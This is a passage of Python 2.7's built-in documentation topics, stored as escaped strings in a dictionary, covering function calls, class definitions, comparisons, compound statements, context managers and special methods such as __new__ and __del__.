Otherwise, the\nvalue of the argument is placed in the slot, filling it (even if the\nexpression is "None", it fills the slot). When all arguments have\nbeen processed, the slots that are still unfilled are filled with the\ncorresponding default value from the function definition. (Default\nvalues are calculated, once, when the function is defined; thus, a\nmutable object such as a list or dictionary used as default value will\nbe shared by all calls that don\'t specify an argument value for the\ncorresponding slot; this should usually be avoided.) If there are any\nunfilled slots for which no default value is specified, a "TypeError"\nexception is raised. Otherwise, the list of filled slots is used as\nthe argument list for the call.\n\n**CPython implementation detail:** An implementation may provide\nbuilt-in functions whose positional parameters do not have names, even\nif they are \'named\' for the purpose of documentation, and which\ntherefore cannot be supplied by keyword. In CPython, this is the case\nfor functions implemented in C that use "PyArg_ParseTuple()" to parse\ntheir arguments.\n\nIf there are more positional arguments than there are formal parameter\nslots, a "TypeError" exception is raised, unless a formal parameter\nusing the syntax "*identifier" is present; in this case, that formal\nparameter receives a tuple containing the excess positional arguments\n(or an empty tuple if there were no excess positional arguments).\n\nIf any keyword argument does not correspond to a formal parameter\nname, a "TypeError" exception is raised, unless a formal parameter\nusing the syntax "**identifier" is present; in this case, that formal\nparameter receives a dictionary containing the excess keyword\narguments (using the keywords as keys and the argument values as\ncorresponding values), or a (new) empty dictionary if there were no\nexcess keyword arguments.\n\nIf the syntax "*expression" appears in the function call, "expression"\nmust evaluate to an iterable. Elements from this iterable are treated\nas if they were additional positional arguments; if there are\npositional arguments *x1*, ..., *xN*, and "expression" evaluates to a\nsequence *y1*, ..., *yM*, this is equivalent to a call with M+N\npositional arguments *x1*, ..., *xN*, *y1*, ..., *yM*.\n\nA consequence of this is that although the "*expression" syntax may\nappear *after* some keyword arguments, it is processed *before* the\nkeyword arguments (and the "**expression" argument, if any -- see\nbelow). So:\n\n >>> def f(a, b):\n ... print a, b\n ...\n >>> f(b=1, *(2,))\n 2 1\n >>> f(a=1, *(2,))\n Traceback (most recent call last):\n File "<stdin>", line 1, in ?\n TypeError: f() got multiple values for keyword argument \'a\'\n >>> f(1, *(2,))\n 1 2\n\nIt is unusual for both keyword arguments and the "*expression" syntax\nto be used in the same call, so in practice this confusion does not\narise.\n\nIf the syntax "**expression" appears in the function call,\n"expression" must evaluate to a mapping, the contents of which are\ntreated as additional keyword arguments. In the case of a keyword\nappearing in both "expression" and as an explicit keyword argument, a\n"TypeError" exception is raised.\n\nFormal parameters using the syntax "*identifier" or "**identifier"\ncannot be used as positional argument slots or as keyword argument\nnames. Formal parameters using the syntax "(sublist)" cannot be used\nas keyword argument names; the outermost sublist corresponds to a\nsingle unnamed argument slot, and the argument value is assigned to\nthe sublist using the usual tuple assignment rules after all other\nparameter processing is done.\n\nA call always returns some value, possibly "None", unless it raises an\nexception. How this value is computed depends on the type of the\ncallable object.\n\nIf it is---\n\na user-defined function:\n The code block for the function is executed, passing it the\n argument list. The first thing the code block will do is bind the\n formal parameters to the arguments; this is described in section\n Function definitions. When the code block executes a "return"\n statement, this specifies the return value of the function call.\n\na built-in function or method:\n The result is up to the interpreter; see Built-in Functions for the\n descriptions of built-in functions and methods.\n\na class object:\n A new instance of that class is returned.\n\na class instance method:\n The corresponding user-defined function is called, with an argument\n list that is one longer than the argument list of the call: the\n instance becomes the first argument.\n\na class instance:\n The class must define a "__call__()" method; the effect is then the\n same as if that method was called.\n', 'class': u'\nClass definitions\n*****************\n\nA class definition defines a class object (see section The standard\ntype hierarchy):\n\n classdef ::= "class" classname [inheritance] ":" suite\n inheritance ::= "(" [expression_list] ")"\n classname ::= identifier\n\nA class definition is an executable statement. It first evaluates the\ninheritance list, if present. Each item in the inheritance list\nshould evaluate to a class object or class type which allows\nsubclassing. The class\'s suite is then executed in a new execution\nframe (see section Naming and binding), using a newly created local\nnamespace and the original global namespace. (Usually, the suite\ncontains only function definitions.) When the class\'s suite finishes\nexecution, its execution frame is discarded but its local namespace is\nsaved. [4] A class object is then created using the inheritance list\nfor the base classes and the saved local namespace for the attribute\ndictionary. The class name is bound to this class object in the\noriginal local namespace.\n\n**Programmer\'s note:** Variables defined in the class definition are\nclass variables; they are shared by all instances. To create instance\nvariables, they can be set in a method with "self.name = value". Both\nclass and instance variables are accessible through the notation\n""self.name"", and an instance variable hides a class variable with\nthe same name when accessed in this way. Class variables can be used\nas defaults for instance variables, but using mutable values there can\nlead to unexpected results. For *new-style class*es, descriptors can\nbe used to create instance variables with different implementation\ndetails.\n\nClass definitions, like function definitions, may be wrapped by one or\nmore *decorator* expressions. The evaluation rules for the decorator\nexpressions are the same as for functions. The result must be a class\nobject, which is then bound to the class name.\n\n-[ Footnotes ]-\n\n[1] The exception is propagated to the invocation stack unless\n there is a "finally" clause which happens to raise another\n exception. That new exception causes the old one to be lost.\n\n[2] Currently, control "flows off the end" except in the case of\n an exception or the execution of a "return", "continue", or\n "break" statement.\n\n[3] A string literal appearing as the first statement in the\n function body is transformed into the function\'s "__doc__"\n attribute and therefore the function\'s *docstring*.\n\n[4] A string literal appearing as the first statement in the class\n body is transformed into the namespace\'s "__doc__" item and\n therefore the class\'s *docstring*.\n', 'comparisons': u'\nComparisons\n***********\n\nUnlike C, all comparison operations in Python have the same priority,\nwhich is lower than that of any arithmetic, shifting or bitwise\noperation. Also unlike C, expressions like "a < b < c" have the\ninterpretation that is conventional in mathematics:\n\n comparison ::= or_expr ( comp_operator or_expr )*\n comp_operator ::= "<" | ">" | "==" | ">=" | "<=" | "<>" | "!="\n | "is" ["not"] | ["not"] "in"\n\nComparisons yield boolean values: "True" or "False".\n\nComparisons can be chained arbitrarily, e.g., "x < y <= z" is\nequivalent to "x < y and y <= z", except that "y" is evaluated only\nonce (but in both cases "z" is not evaluated at all when "x < y" is\nfound to be false).\n\nFormally, if *a*, *b*, *c*, ..., *y*, *z* are expressions and *op1*,\n*op2*, ..., *opN* are comparison operators, then "a op1 b op2 c ... y\nopN z" is equivalent to "a op1 b and b op2 c and ... y opN z", except\nthat each expression is evaluated at most once.\n\nNote that "a op1 b op2 c" doesn\'t imply any kind of comparison between\n*a* and *c*, so that, e.g., "x < y > z" is perfectly legal (though\nperhaps not pretty).\n\nThe forms "<>" and "!=" are equivalent; for consistency with C, "!="\nis preferred; where "!=" is mentioned below "<>" is also accepted.\nThe "<>" spelling is considered obsolescent.\n\nThe operators "<", ">", "==", ">=", "<=", and "!=" compare the values\nof two objects. The objects need not have the same type. If both are\nnumbers, they are converted to a common type. Otherwise, objects of\ndifferent types *always* compare unequal, and are ordered consistently\nbut arbitrarily. You can control comparison behavior of objects of\nnon-built-in types by defining a "__cmp__" method or rich comparison\nmethods like "__gt__", described in section Special method names.\n\n(This unusual definition of comparison was used to simplify the\ndefinition of operations like sorting and the "in" and "not in"\noperators. In the future, the comparison rules for objects of\ndifferent types are likely to change.)\n\nComparison of objects of the same type depends on the type:\n\n* Numbers are compared arithmetically.\n\n* Strings are compared lexicographically using the numeric\n equivalents (the result of the built-in function "ord()") of their\n characters. Unicode and 8-bit strings are fully interoperable in\n this behavior. [4]\n\n* Tuples and lists are compared lexicographically using comparison\n of corresponding elements. This means that to compare equal, each\n element must compare equal and the two sequences must be of the same\n type and have the same length.\n\n If not equal, the sequences are ordered the same as their first\n differing elements. For example, "cmp([1,2,x], [1,2,y])" returns\n the same as "cmp(x,y)". If the corresponding element does not\n exist, the shorter sequence is ordered first (for example, "[1,2] <\n [1,2,3]").\n\n* Mappings (dictionaries) compare equal if and only if their sorted\n (key, value) lists compare equal. [5] Outcomes other than equality\n are resolved consistently, but are not otherwise defined. [6]\n\n* Most other objects of built-in types compare unequal unless they\n are the same object; the choice whether one object is considered\n smaller or larger than another one is made arbitrarily but\n consistently within one execution of a program.\n\nThe operators "in" and "not in" test for collection membership. "x in\ns" evaluates to true if *x* is a member of the collection *s*, and\nfalse otherwise. "x not in s" returns the negation of "x in s". The\ncollection membership test has traditionally been bound to sequences;\nan object is a member of a collection if the collection is a sequence\nand contains an element equal to that object. However, it make sense\nfor many other object types to support membership tests without being\na sequence. In particular, dictionaries (for keys) and sets support\nmembership testing.\n\nFor the list and tuple types, "x in y" is true if and only if there\nexists an index *i* such that "x == y[i]" is true.\n\nFor the Unicode and string types, "x in y" is true if and only if *x*\nis a substring of *y*. An equivalent test is "y.find(x) != -1".\nNote, *x* and *y* need not be the same type; consequently, "u\'ab\' in\n\'abc\'" will return "True". Empty strings are always considered to be a\nsubstring of any other string, so """ in "abc"" will return "True".\n\nChanged in version 2.3: Previously, *x* was required to be a string of\nlength "1".\n\nFor user-defined classes which define the "__contains__()" method, "x\nin y" is true if and only if "y.__contains__(x)" is true.\n\nFor user-defined classes which do not define "__contains__()" but do\ndefine "__iter__()", "x in y" is true if some value "z" with "x == z"\nis produced while iterating over "y". If an exception is raised\nduring the iteration, it is as if "in" raised that exception.\n\nLastly, the old-style iteration protocol is tried: if a class defines\n"__getitem__()", "x in y" is true if and only if there is a non-\nnegative integer index *i* such that "x == y[i]", and all lower\ninteger indices do not raise "IndexError" exception. (If any other\nexception is raised, it is as if "in" raised that exception).\n\nThe operator "not in" is defined to have the inverse true value of\n"in".\n\nThe operators "is" and "is not" test for object identity: "x is y" is\ntrue if and only if *x* and *y* are the same object. "x is not y"\nyields the inverse truth value. [7]\n', 'compound': u'\nCompound statements\n*******************\n\nCompound statements contain (groups of) other statements; they affect\nor control the execution of those other statements in some way. In\ngeneral, compound statements span multiple lines, although in simple\nincarnations a whole compound statement may be contained in one line.\n\nThe "if", "while" and "for" statements implement traditional control\nflow constructs. "try" specifies exception handlers and/or cleanup\ncode for a group of statements. Function and class definitions are\nalso syntactically compound statements.\n\nCompound statements consist of one or more \'clauses.\' A clause\nconsists of a header and a \'suite.\' The clause headers of a\nparticular compound statement are all at the same indentation level.\nEach clause header begins with a uniquely identifying keyword and ends\nwith a colon. A suite is a group of statements controlled by a\nclause. A suite can be one or more semicolon-separated simple\nstatements on the same line as the header, following the header\'s\ncolon, or it can be one or more indented statements on subsequent\nlines. Only the latter form of suite can contain nested compound\nstatements; the following is illegal, mostly because it wouldn\'t be\nclear to which "if" clause a following "else" clause would belong:\n\n if test1: if test2: print x\n\nAlso note that the semicolon binds tighter than the colon in this\ncontext, so that in the following example, either all or none of the\n"print" statements are executed:\n\n if x < y < z: print x; print y; print z\n\nSummarizing:\n\n compound_stmt ::= if_stmt\n | while_stmt\n | for_stmt\n | try_stmt\n | with_stmt\n | funcdef\n | classdef\n | decorated\n suite ::= stmt_list NEWLINE | NEWLINE INDENT statement+ DEDENT\n statement ::= stmt_list NEWLINE | compound_stmt\n stmt_list ::= simple_stmt (";" simple_stmt)* [";"]\n\nNote that statements always end in a "NEWLINE" possibly followed by a\n"DEDENT". Also note that optional continuation clauses always begin\nwith a keyword that cannot start a statement, thus there are no\nambiguities (the \'dangling "else"\' problem is solved in Python by\nrequiring nested "if" statements to be indented).\n\nThe formatting of the grammar rules in the following sections places\neach clause on a separate line for clarity.\n\n\nThe "if" statement\n==================\n\nThe "if" statement is used for conditional execution:\n\n if_stmt ::= "if" expression ":" suite\n ( "elif" expression ":" suite )*\n ["else" ":" suite]\n\nIt selects exactly one of the suites by evaluating the expressions one\nby one until one is found to be true (see section Boolean operations\nfor the definition of true and false); then that suite is executed\n(and no other part of the "if" statement is executed or evaluated).\nIf all expressions are false, the suite of the "else" clause, if\npresent, is executed.\n\n\nThe "while" statement\n=====================\n\nThe "while" statement is used for repeated execution as long as an\nexpression is true:\n\n while_stmt ::= "while" expression ":" suite\n ["else" ":" suite]\n\nThis repeatedly tests the expression and, if it is true, executes the\nfirst suite; if the expression is false (which may be the first time\nit is tested) the suite of the "else" clause, if present, is executed\nand the loop terminates.\n\nA "break" statement executed in the first suite terminates the loop\nwithout executing the "else" clause\'s suite. A "continue" statement\nexecuted in the first suite skips the rest of the suite and goes back\nto testing the expression.\n\n\nThe "for" statement\n===================\n\nThe "for" statement is used to iterate over the elements of a sequence\n(such as a string, tuple or list) or other iterable object:\n\n for_stmt ::= "for" target_list "in" expression_list ":" suite\n ["else" ":" suite]\n\nThe expression list is evaluated once; it should yield an iterable\nobject. An iterator is created for the result of the\n"expression_list". The suite is then executed once for each item\nprovided by the iterator, in the order of ascending indices. Each\nitem in turn is assigned to the target list using the standard rules\nfor assignments, and then the suite is executed. When the items are\nexhausted (which is immediately when the sequence is empty), the suite\nin the "else" clause, if present, is executed, and the loop\nterminates.\n\nA "break" statement executed in the first suite terminates the loop\nwithout executing the "else" clause\'s suite. A "continue" statement\nexecuted in the first suite skips the rest of the suite and continues\nwith the next item, or with the "else" clause if there was no next\nitem.\n\nThe suite may assign to the variable(s) in the target list; this does\nnot affect the next item assigned to it.\n\nThe target list is not deleted when the loop is finished, but if the\nsequence is empty, it will not have been assigned to at all by the\nloop. Hint: the built-in function "range()" returns a sequence of\nintegers suitable to emulate the effect of Pascal\'s "for i := a to b\ndo"; e.g., "range(3)" returns the list "[0, 1, 2]".\n\nNote: There is a subtlety when the sequence is being modified by the\n loop (this can only occur for mutable sequences, i.e. lists). An\n internal counter is used to keep track of which item is used next,\n and this is incremented on each iteration. When this counter has\n reached the length of the sequence the loop terminates. This means\n that if the suite deletes the current (or a previous) item from the\n sequence, the next item will be skipped (since it gets the index of\n the current item which has already been treated). Likewise, if the\n suite inserts an item in the sequence before the current item, the\n current item will be treated again the next time through the loop.\n This can lead to nasty bugs that can be avoided by making a\n temporary copy using a slice of the whole sequence, e.g.,\n\n for x in a[:]:\n if x < 0: a.remove(x)\n\n\nThe "try" statement\n===================\n\nThe "try" statement specifies exception handlers and/or cleanup code\nfor a group of statements:\n\n try_stmt ::= try1_stmt | try2_stmt\n try1_stmt ::= "try" ":" suite\n ("except" [expression [("as" | ",") identifier]] ":" suite)+\n ["else" ":" suite]\n ["finally" ":" suite]\n try2_stmt ::= "try" ":" suite\n "finally" ":" suite\n\nChanged in version 2.5: In previous versions of Python,\n"try"..."except"..."finally" did not work. "try"..."except" had to be\nnested in "try"..."finally".\n\nThe "except" clause(s) specify one or more exception handlers. When no\nexception occurs in the "try" clause, no exception handler is\nexecuted. When an exception occurs in the "try" suite, a search for an\nexception handler is started. This search inspects the except clauses\nin turn until one is found that matches the exception. An expression-\nless except clause, if present, must be last; it matches any\nexception. For an except clause with an expression, that expression\nis evaluated, and the clause matches the exception if the resulting\nobject is "compatible" with the exception. An object is compatible\nwith an exception if it is the class or a base class of the exception\nobject, or a tuple containing an item compatible with the exception.\n\nIf no except clause matches the exception, the search for an exception\nhandler continues in the surrounding code and on the invocation stack.\n[1]\n\nIf the evaluation of an expression in the header of an except clause\nraises an exception, the original search for a handler is canceled and\na search starts for the new exception in the surrounding code and on\nthe call stack (it is treated as if the entire "try" statement raised\nthe exception).\n\nWhen a matching except clause is found, the exception is assigned to\nthe target specified in that except clause, if present, and the except\nclause\'s suite is executed. All except clauses must have an\nexecutable block. When the end of this block is reached, execution\ncontinues normally after the entire try statement. (This means that\nif two nested handlers exist for the same exception, and the exception\noccurs in the try clause of the inner handler, the outer handler will\nnot handle the exception.)\n\nBefore an except clause\'s suite is executed, details about the\nexception are assigned to three variables in the "sys" module:\n"sys.exc_type" receives the object identifying the exception;\n"sys.exc_value" receives the exception\'s parameter;\n"sys.exc_traceback" receives a traceback object (see section The\nstandard type hierarchy) identifying the point in the program where\nthe exception occurred. These details are also available through the\n"sys.exc_info()" function, which returns a tuple "(exc_type,\nexc_value, exc_traceback)". Use of the corresponding variables is\ndeprecated in favor of this function, since their use is unsafe in a\nthreaded program. As of Python 1.5, the variables are restored to\ntheir previous values (before the call) when returning from a function\nthat handled an exception.\n\nThe optional "else" clause is executed if and when control flows off\nthe end of the "try" clause. [2] Exceptions in the "else" clause are\nnot handled by the preceding "except" clauses.\n\nIf "finally" is present, it specifies a \'cleanup\' handler. The "try"\nclause is executed, including any "except" and "else" clauses. If an\nexception occurs in any of the clauses and is not handled, the\nexception is temporarily saved. The "finally" clause is executed. If\nthere is a saved exception, it is re-raised at the end of the\n"finally" clause. If the "finally" clause raises another exception or\nexecutes a "return" or "break" statement, the saved exception is\ndiscarded:\n\n >>> def f():\n ... try:\n ... 1/0\n ... finally:\n ... return 42\n ...\n >>> f()\n 42\n\nThe exception information is not available to the program during\nexecution of the "finally" clause.\n\nWhen a "return", "break" or "continue" statement is executed in the\n"try" suite of a "try"..."finally" statement, the "finally" clause is\nalso executed \'on the way out.\' A "continue" statement is illegal in\nthe "finally" clause. (The reason is a problem with the current\nimplementation --- this restriction may be lifted in the future).\n\nThe return value of a function is determined by the last "return"\nstatement executed. Since the "finally" clause always executes, a\n"return" statement executed in the "finally" clause will always be the\nlast one executed:\n\n >>> def foo():\n ... try:\n ... return \'try\'\n ... finally:\n ... return \'finally\'\n ...\n >>> foo()\n \'finally\'\n\nAdditional information on exceptions can be found in section\nExceptions, and information on using the "raise" statement to generate\nexceptions may be found in section The raise statement.\n\n\nThe "with" statement\n====================\n\nNew in version 2.5.\n\nThe "with" statement is used to wrap the execution of a block with\nmethods defined by a context manager (see section With Statement\nContext Managers). This allows common "try"..."except"..."finally"\nusage patterns to be encapsulated for convenient reuse.\n\n with_stmt ::= "with" with_item ("," with_item)* ":" suite\n with_item ::= expression ["as" target]\n\nThe execution of the "with" statement with one "item" proceeds as\nfollows:\n\n1. The context expression (the expression given in the "with_item")\n is evaluated to obtain a context manager.\n\n2. The context manager\'s "__exit__()" is loaded for later use.\n\n3. The context manager\'s "__enter__()" method is invoked.\n\n4. If a target was included in the "with" statement, the return\n value from "__enter__()" is assigned to it.\n\n Note: The "with" statement guarantees that if the "__enter__()"\n method returns without an error, then "__exit__()" will always be\n called. Thus, if an error occurs during the assignment to the\n target list, it will be treated the same as an error occurring\n within the suite would be. See step 6 below.\n\n5. The suite is executed.\n\n6. The context manager\'s "__exit__()" method is invoked. If an\n exception caused the suite to be exited, its type, value, and\n traceback are passed as arguments to "__exit__()". Otherwise, three\n "None" arguments are supplied.\n\n If the suite was exited due to an exception, and the return value\n from the "__exit__()" method was false, the exception is reraised.\n If the return value was true, the exception is suppressed, and\n execution continues with the statement following the "with"\n statement.\n\n If the suite was exited for any reason other than an exception, the\n return value from "__exit__()" is ignored, and execution proceeds\n at the normal location for the kind of exit that was taken.\n\nWith more than one item, the context managers are processed as if\nmultiple "with" statements were nested:\n\n with A() as a, B() as b:\n suite\n\nis equivalent to\n\n with A() as a:\n with B() as b:\n suite\n\nNote: In Python 2.5, the "with" statement is only allowed when the\n "with_statement" feature has been enabled. It is always enabled in\n Python 2.6.\n\nChanged in version 2.7: Support for multiple context expressions.\n\nSee also:\n\n **PEP 0343** - The "with" statement\n The specification, background, and examples for the Python "with"\n statement.\n\n\nFunction definitions\n====================\n\nA function definition defines a user-defined function object (see\nsection The standard type hierarchy):\n\n decorated ::= decorators (classdef | funcdef)\n decorators ::= decorator+\n decorator ::= "@" dotted_name ["(" [argument_list [","]] ")"] NEWLINE\n funcdef ::= "def" funcname "(" [parameter_list] ")" ":" suite\n dotted_name ::= identifier ("." identifier)*\n parameter_list ::= (defparameter ",")*\n ( "*" identifier ["," "**" identifier]\n | "**" identifier\n | defparameter [","] )\n defparameter ::= parameter ["=" expression]\n sublist ::= parameter ("," parameter)* [","]\n parameter ::= identifier | "(" sublist ")"\n funcname ::= identifier\n\nA function definition is an executable statement. Its execution binds\nthe function name in the current local namespace to a function object\n(a wrapper around the executable code for the function). This\nfunction object contains a reference to the current global namespace\nas the global namespace to be used when the function is called.\n\nThe function definition does not execute the function body; this gets\nexecuted only when the function is called. [3]\n\nA function definition may be wrapped by one or more *decorator*\nexpressions. Decorator expressions are evaluated when the function is\ndefined, in the scope that contains the function definition. The\nresult must be a callable, which is invoked with the function object\nas the only argument. The returned value is bound to the function name\ninstead of the function object. Multiple decorators are applied in\nnested fashion. For example, the following code:\n\n @f1(arg)\n @f2\n def func(): pass\n\nis equivalent to:\n\n def func(): pass\n func = f1(arg)(f2(func))\n\nWhen one or more top-level *parameters* have the form *parameter* "="\n*expression*, the function is said to have "default parameter values."\nFor a parameter with a default value, the corresponding *argument* may\nbe omitted from a call, in which case the parameter\'s default value is\nsubstituted. If a parameter has a default value, all following\nparameters must also have a default value --- this is a syntactic\nrestriction that is not expressed by the grammar.\n\n**Default parameter values are evaluated when the function definition\nis executed.** This means that the expression is evaluated once, when\nthe function is defined, and that the same "pre-computed" value is\nused for each call. This is especially important to understand when a\ndefault parameter is a mutable object, such as a list or a dictionary:\nif the function modifies the object (e.g. by appending an item to a\nlist), the default value is in effect modified. This is generally not\nwhat was intended. A way around this is to use "None" as the\ndefault, and explicitly test for it in the body of the function, e.g.:\n\n def whats_on_the_telly(penguin=None):\n if penguin is None:\n penguin = []\n penguin.append("property of the zoo")\n return penguin\n\nFunction call semantics are described in more detail in section Calls.\nA function call always assigns values to all parameters mentioned in\nthe parameter list, either from position arguments, from keyword\narguments, or from default values. If the form ""*identifier"" is\npresent, it is initialized to a tuple receiving any excess positional\nparameters, defaulting to the empty tuple. If the form\n""**identifier"" is present, it is initialized to a new dictionary\nreceiving any excess keyword arguments, defaulting to a new empty\ndictionary.\n\nIt is also possible to create anonymous functions (functions not bound\nto a name), for immediate use in expressions. This uses lambda\nexpressions, described in section Lambdas. Note that the lambda\nexpression is merely a shorthand for a simplified function definition;\na function defined in a ""def"" statement can be passed around or\nassigned to another name just like a function defined by a lambda\nexpression. The ""def"" form is actually more powerful since it\nallows the execution of multiple statements.\n\n**Programmer\'s note:** Functions are first-class objects. A ""def""\nform executed inside a function definition defines a local function\nthat can be returned or passed around. Free variables used in the\nnested function can access the local variables of the function\ncontaining the def. See section Naming and binding for details.\n\n\nClass definitions\n=================\n\nA class definition defines a class object (see section The standard\ntype hierarchy):\n\n classdef ::= "class" classname [inheritance] ":" suite\n inheritance ::= "(" [expression_list] ")"\n classname ::= identifier\n\nA class definition is an executable statement. It first evaluates the\ninheritance list, if present. Each item in the inheritance list\nshould evaluate to a class object or class type which allows\nsubclassing. The class\'s suite is then executed in a new execution\nframe (see section Naming and binding), using a newly created local\nnamespace and the original global namespace. (Usually, the suite\ncontains only function definitions.) When the class\'s suite finishes\nexecution, its execution frame is discarded but its local namespace is\nsaved. [4] A class object is then created using the inheritance list\nfor the base classes and the saved local namespace for the attribute\ndictionary. The class name is bound to this class object in the\noriginal local namespace.\n\n**Programmer\'s note:** Variables defined in the class definition are\nclass variables; they are shared by all instances. To create instance\nvariables, they can be set in a method with "self.name = value". Both\nclass and instance variables are accessible through the notation\n""self.name"", and an instance variable hides a class variable with\nthe same name when accessed in this way. Class variables can be used\nas defaults for instance variables, but using mutable values there can\nlead to unexpected results. For *new-style class*es, descriptors can\nbe used to create instance variables with different implementation\ndetails.\n\nClass definitions, like function definitions, may be wrapped by one or\nmore *decorator* expressions. The evaluation rules for the decorator\nexpressions are the same as for functions. The result must be a class\nobject, which is then bound to the class name.\n\n-[ Footnotes ]-\n\n[1] The exception is propagated to the invocation stack unless\n there is a "finally" clause which happens to raise another\n exception. That new exception causes the old one to be lost.\n\n[2] Currently, control "flows off the end" except in the case of\n an exception or the execution of a "return", "continue", or\n "break" statement.\n\n[3] A string literal appearing as the first statement in the\n function body is transformed into the function\'s "__doc__"\n attribute and therefore the function\'s *docstring*.\n\n[4] A string literal appearing as the first statement in the class\n body is transformed into the namespace\'s "__doc__" item and\n therefore the class\'s *docstring*.\n', 'context-managers': u'\nWith Statement Context Managers\n*******************************\n\nNew in version 2.5.\n\nA *context manager* is an object that defines the runtime context to\nbe established when executing a "with" statement. The context manager\nhandles the entry into, and the exit from, the desired runtime context\nfor the execution of the block of code. Context managers are normally\ninvoked using the "with" statement (described in section The with\nstatement), but can also be used by directly invoking their methods.\n\nTypical uses of context managers include saving and restoring various\nkinds of global state, locking and unlocking resources, closing opened\nfiles, etc.\n\nFor more information on context managers, see Context Manager Types.\n\nobject.__enter__(self)\n\n Enter the runtime context related to this object. The "with"\n statement will bind this method\'s return value to the target(s)\n specified in the "as" clause of the statement, if any.\n\nobject.__exit__(self, exc_type, exc_value, traceback)\n\n Exit the runtime context related to this object. The parameters\n describe the exception that caused the context to be exited. If the\n context was exited without an exception, all three arguments will\n be "None".\n\n If an exception is supplied, and the method wishes to suppress the\n exception (i.e., prevent it from being propagated), it should\n return a true value. Otherwise, the exception will be processed\n normally upon exit from this method.\n\n Note that "__exit__()" methods should not reraise the passed-in\n exception; this is the caller\'s responsibility.\n\nSee also:\n\n **PEP 0343** - The "with" statement\n The specification, background, and examples for the Python "with"\n statement.\n', 'continue': u'\nThe "continue" statement\n************************\n\n continue_stmt ::= "continue"\n\n"continue" may only occur syntactically nested in a "for" or "while"\nloop, but not nested in a function or class definition or "finally"\nclause within that loop. It continues with the next cycle of the\nnearest enclosing loop.\n\nWhen "continue" passes control out of a "try" statement with a\n"finally" clause, that "finally" clause is executed before really\nstarting the next loop cycle.\n', 'conversions': u'\nArithmetic conversions\n**********************\n\nWhen a description of an arithmetic operator below uses the phrase\n"the numeric arguments are converted to a common type," the arguments\nare coerced using the coercion rules listed at Coercion rules. If\nboth arguments are standard numeric types, the following coercions are\napplied:\n\n* If either argument is a complex number, the other is converted to\n complex;\n\n* otherwise, if either argument is a floating point number, the\n other is converted to floating point;\n\n* otherwise, if either argument is a long integer, the other is\n converted to long integer;\n\n* otherwise, both must be plain integers and no conversion is\n necessary.\n\nSome additional rules apply for certain operators (e.g., a string left\nargument to the \'%\' operator). Extensions can define their own\ncoercions.\n', 'customization': u'\nBasic customization\n*******************\n\nobject.__new__(cls[, ...])\n\n Called to create a new instance of class *cls*. "__new__()" is a\n static method (special-cased so you need not declare it as such)\n that takes the class of which an instance was requested as its\n first argument. The remaining arguments are those passed to the\n object constructor expression (the call to the class). The return\n value of "__new__()" should be the new object instance (usually an\n instance of *cls*).\n\n Typical implementations create a new instance of the class by\n invoking the superclass\'s "__new__()" method using\n "super(currentclass, cls).__new__(cls[, ...])" with appropriate\n arguments and then modifying the newly-created instance as\n necessary before returning it.\n\n If "__new__()" returns an instance of *cls*, then the new\n instance\'s "__init__()" method will be invoked like\n "__init__(self[, ...])", where *self* is the new instance and the\n remaining arguments are the same as were passed to "__new__()".\n\n If "__new__()" does not return an instance of *cls*, then the new\n instance\'s "__init__()" method will not be invoked.\n\n "__new__()" is intended mainly to allow subclasses of immutable\n types (like int, str, or tuple) to customize instance creation. It\n is also commonly overridden in custom metaclasses in order to\n customize class creation.\n\nobject.__init__(self[, ...])\n\n Called after the instance has been created (by "__new__()"), but\n before it is returned to the caller. The arguments are those\n passed to the class constructor expression. If a base class has an\n "__init__()" method, the derived class\'s "__init__()" method, if\n any, must explicitly call it to ensure proper initialization of the\n base class part of the instance; for example:\n "BaseClass.__init__(self, [args...])".\n\n Because "__new__()" and "__init__()" work together in constructing\n objects ("__new__()" to create it, and "__init__()" to customise\n it), no non-"None" value may be returned by "__init__()"; doing so\n will cause a "TypeError" to be raised at runtime.\n\nobject.__del__(self)\n\n Called when the instance is about to be destroyed. This is also\n called a destructor. If a base class has a "__del__()" method, the\n derived class\'s "__del__()" method, if any, must explicitly call it\n to ensure proper deletion of the base class part of the instance.\n Note that it is possible (though not recommended!) for the\n "__del__()" method to postpone destruction of the instance by\n creating a new reference to it. It may then be called at a later\n time when this new reference is deleted. It is not guaranteed that\n "__del__()" methods are called for objects that still exist when\n the interpreter exits.\n\n Note: "del x" doesn\'t directly call "x.__del__()" --- the former\n decrements the reference count for "x" by one, and the latter is\n only called when "x"\'s reference count reaches zero. Some common\n situations that may prevent the reference count of an object from\n going to zero include: circular references between objects (e.g.,\n a doubly-linked list or a tree data structure with parent and\n child pointers); a reference to the object on the stack frame of\n a function that caught an exception (the traceback stored in\n "sys.exc_traceback" keeps the stack frame alive); or a reference\n to the object on the stack frame that raised an unhandled\n exception in interactive mode (the traceback stored in\n "sys.last_traceback" keeps the stack frame alive). The first\n situation can only be remedied by explicitly breaking the cycles;\n the latter two situations can be resolved by storing "None" in\n "sys.exc_traceback" or "sys.last_traceback". Circular references\n which are garbage are detected when the option cycle detector is\n enabled (it\'s on by default), but can only be cleaned up if there\n are no Python-level "__del__()" methods involved. Refer to the\n documentation for the "gc" module for more information about how\n "__del__()" methods are handled by the cycle detector,\n particularly the description of the "garbage" value.\n\n Warning: Due to the precarious circumstances under which\n "__del__()" methods are invoked, exceptions that occur during\n their execution are ignored, and a warning is printed to\n "sys.stderr" instead. Also, when "__del__()" is invoked in\n response to a module being deleted (e.g., when execution of the\n program is done), other globals referenced by the "__del__()"\n method may already have been deleted or in the process of being\n torn down (e.g. the import machinery shutting down). For this\n reason, "__del__()" methods should do the absolute minimum needed\n to maintain external invariants. Starting with version 1.5,\n Python guarantees that globals whose name begins with a single\n underscore are deleted from their module before other globals are\n deleted; if no other references to such globals exist, this may\n help in assuring that imported modules are still available at the\n time when the "__del__()" method is called.\n\n See also the "-R" command-line option.\n\nobject.__repr__(self)\n\n Called by the "repr()" built-in function and by string conversions\n (reverse quotes) to compute the "official" string representation of\n an object. If at all possible, this should look like a valid\n Python expression that could be used to recreate an object with the\n same value (given an appropriate environment). If this is not\n possible, a string of the form "<...some useful description...>"\n should be returned. The return value must be a string object. If a\n class defines "__repr__()" but not "__str__()", then "__repr__()"\n is also used when an "informal" string representation of instances\n of that class is required.\n\n This is typically used for debugging, so it is important that the\n representation is information-rich and unambiguous.\n\nobject.__str__(self)\n\n Called by the "str()" built-in function and by the "print"\n statement to compute the "informal" string representation of an\n object. This differs from "__repr__()" in that it does not have to\n be a valid Python expression: a more convenient or concise\n representation may be used instead. The return value must be a\n string object.\n\nobject.__lt__(self, other)\nobject.__le__(self, other)\nobject.__eq__(self, other)\nobject.__ne__(self, other)\nobject.__gt__(self, other)\nobject.__ge__(self, other)\n\n New in version 2.1.\n\n These are the so-called "rich comparison" methods, and are called\n 